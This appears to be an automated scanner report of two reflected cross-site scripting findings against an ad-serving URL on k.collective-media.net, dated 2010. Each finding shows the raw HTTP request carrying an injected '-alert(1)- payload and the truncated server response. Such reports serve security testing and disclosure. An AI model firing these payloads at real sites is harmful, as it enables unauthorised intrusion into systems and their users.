1. Cross-site scripting (reflected)
1.1. http://k.collective-media.net/cmadj/cm.rubnydn/ [REST URL parameter 2]
Severity: | High |
Confidence: | Certain |
Host: | http://k.collective-media |
Path: | /cmadj/cm.rubnydn/ |
GET /cmadj/cm.rubnydnfc934'-alert(1)- Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; optout=1; JY57=opt_out; |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www Date: Mon, 01 Nov 2010 22:10:05 GMT Content-Length: 7060 Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://k.collective-media |
Path: | /cmadj/cm.rubnydn/ |
GET /cmadj/cm.rubnydn/?8a95c'-alert(1)- Host: k.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dal; optout=1; JY57=opt_out; |
HTTP/1.1 200 OK Server: nginx/0.7.65 Content-Type: application/x-javascript P3P: policyref="http://www Content-Length: 7062 Date: Mon, 01 Nov 2010 22:10:01 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |